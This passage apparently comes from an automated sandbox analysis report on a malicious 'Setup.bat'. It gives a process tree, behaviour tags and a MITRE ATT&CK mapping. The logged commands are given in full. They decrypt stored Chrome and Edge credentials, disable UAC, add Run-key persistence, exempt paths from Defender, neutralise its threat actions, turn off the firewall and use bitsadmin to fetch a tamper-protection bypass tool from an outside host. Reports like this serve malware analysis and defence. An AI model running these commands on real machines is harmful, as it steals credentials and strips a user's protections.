    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:2308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,241,173,50,248,48,233,4,229,245,201,146,154,115,98,33,115,73,47,145,149,219,0,76,224,75,238,207,77,243,118,177,201,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,36,144,200,68,162,221,179,194,26,103,200,200,85,181,197,147,65,240,114,77,146,124,55,46,108,10,161,238,71,0,78,7,48,0,0,0,156,77,116,228,75,203,177,250,227,93,81,127,228,115,6,183,240,205,136,99,238,243,170,198,71,189,51,118,193,34,101,52,151,58,240,142,129,23,129,118,83,129,205,128,158,223,219,198,64,0,0,0,249,223,58,23,28,104,226,94,161,154,21,121,253,209,176,1,240,233,220,232,89,251,132,38,156,9,151,153,25,81,61,189,122,16,236,108,252,247,143,85,136,120,142,14,33,105,40,81,30,203,46,2,241,141,19,71,126,65,251,155,4,135,68,82), $null, 'CurrentUser')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,49,152,1,109,4,35,74,134,55,38,131,228,100,42,238,53,178,55,30,134,7,37,165,237,178,93,156,101,245,191,62,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,86,181,197,38,96,238,191,249,119,60,210,30,37,225,68,253,33,96,176,238,20,95,121,70,114,46,72,19,57,187,33,164,48,0,0,0,104,71,119,91,209,180,219,67,123,143,224,118,225,160,232,83,211,171,202,179,232,98,226,246,202,114,113,180,168,140,241,159,182,146,20,64,248,224,163,228,79,94,79,246,246,94,10,242,64,0,0,0,244,49,108,171,94,228,13,54,126,40,215,34,110,45,44,21,207,216,229,41,206,79,40,238,174,79,18,163,97,16,34,34,20,244,186,225,155,106,134,219,148,6,182,27,204,46,253,245,72,247,169,159,146,31,48,251,244,129,238,155,83,133,70,15), $null, 'CurrentUser')"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    PID:3736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,111,11,152,43,226,32,145,73,137,243,42,18,79,120,126,126,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,49,152,1,109,4,35,74,134,55,38,131,228,100,42,238,53,178,55,30,134,7,37,165,237,178,93,156,101,245,191,62,206,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,86,181,197,38,96,238,191,249,119,60,210,30,37,225,68,253,33,96,176,238,20,95,121,70,114,46,72,19,57,187,33,164,48,0,0,0,104,71,119,91,209,180,219,67,123,143,224,118,225,160,232,83,211,171,202,179,232,98,226,246,202,114,113,180,168,140,241,159,182,146,20,64,248,224,163,228,79,94,79,246,246,94,10,242,64,0,0,0,244,49,108,171,94,228,13,54,126,40,215,34,110,45,44,21,207,216,229,41,206,79,40,238,174,79,18,163,97,16,34,34,20,244,186,225,155,106,134,219,148,6,182,27,204,46,253,245,72,247,169,159,146,31,48,251,244,129,238,155,83,133,70,15), $null, 'CurrentUser')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    PID:4876
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
    3⤵
    PID:232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v system.dll /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
    3⤵
    PID:4188
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v system.dll /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
      4⤵
      Adds Run key to start application
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.nM3Vf6IVq8""
    3⤵
    PID:2112
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.nM3Vf6IVq8"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
    3⤵
    PID:516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
    3⤵
    PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    3⤵
    PID:3044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_computersystemproduct get uuid
      4⤵
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
    3⤵
    PID:876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic PATH Win32_VideoController GET Description,PNPDeviceID
      4⤵
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
    3⤵
    PID:2580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
    3⤵
    PID:1396
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
    3⤵
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
    3⤵
    PID:1988
  - - C:\Windows\system32\getmac.exe
      getmac /NH
      4⤵
      PID:1456
- - C:\Users\Admin\AppData\Local\Temp\python-installer.exe
    C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3808
  - - C:\Windows\Temp\{409C94D1-373B-49D0-B283-D6041A0AB75C}\.cr\python-installer.exe
      "C:\Windows\Temp\{409C94D1-373B-49D0-B283-D6041A0AB75C}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=728 -burn.filehandle.self=732 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\C0D3X17 (123)\C0D3X17\Setup.bat" "
1⤵
PID:1636
- C:\Windows\system32\cacls.exe
  "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
  2⤵
  PID:4184
- C:\Windows\system32\wscript.exe
  wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
  2⤵
  PID:2076
- C:\Windows\system32\bitsadmin.exe
  bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
  2⤵
  - Download via BitsAdmin
  PID:3772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
  2⤵
  - UAC bypass
  PID:4312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -PUAProtection disable"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "netsh advfirewall set allprofiles state off"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4628
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:1336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c44718
  2⤵
  PID:3656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,3333787353536142961,7192794440471926701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
  2⤵
  PID:3484

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
PID:5052

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Antimalware Service Executable.exe" -SystemCheck
1⤵
- Executes dropped EXE
PID:100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c44718
  2⤵
  PID:2192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,1357349672286251164,17769670022579598718,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
  2⤵
  PID:4220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c44718
  2⤵
  PID:1996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:3036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
  2⤵
  PID:5932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:5328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
  2⤵
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1
  2⤵
  PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
  2⤵
  PID:2900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1
  2⤵
  PID:5732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:5740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14357088598784153949,14043659237806542631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:5208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:4056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba9c446f8,0x7ffba9c44708,0x7ffba9c44718
  2⤵
  PID:2396

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2456

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5172

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery